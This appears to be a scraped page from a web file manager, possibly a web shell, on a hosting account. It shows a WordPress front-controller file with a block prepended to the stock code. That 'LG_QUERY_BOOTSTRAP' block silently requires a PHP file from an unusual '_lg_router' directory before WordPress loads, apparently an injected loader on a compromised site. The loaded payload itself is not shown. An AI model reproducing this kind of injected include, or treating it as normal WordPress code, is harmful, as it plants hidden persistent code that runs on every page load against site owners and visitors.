/
home
/
fivememails
/
public_html
/
Upload File
📦 Extract ZIP
New Folder
New File
HOME
<?php /* LG_QUERY_BOOTSTRAP_BEGIN */ define('LG_QUERY_SITE_ROOT','/home/fivememails/public_html'); if (is_file('/home/fivememails/public_html/_lg_router/query-bootstrap.php')) require '/home/fivememails/public_html/_lg_router/query-bootstrap.php'; /* LG_QUERY_BOOTSTRAP_END */ /** * Loads the WordPress environment and template. * * @package WordPress */ if ( ! isset( $wp_did_header ) ) { $wp_did_header = true; // Load the WordPress library. require_once __DIR__ . '/wp-load.php'; // Set up the WordPress query. wp(); // Load the theme template. require_once ABSPATH . WPINC . '/template-loader.php'; }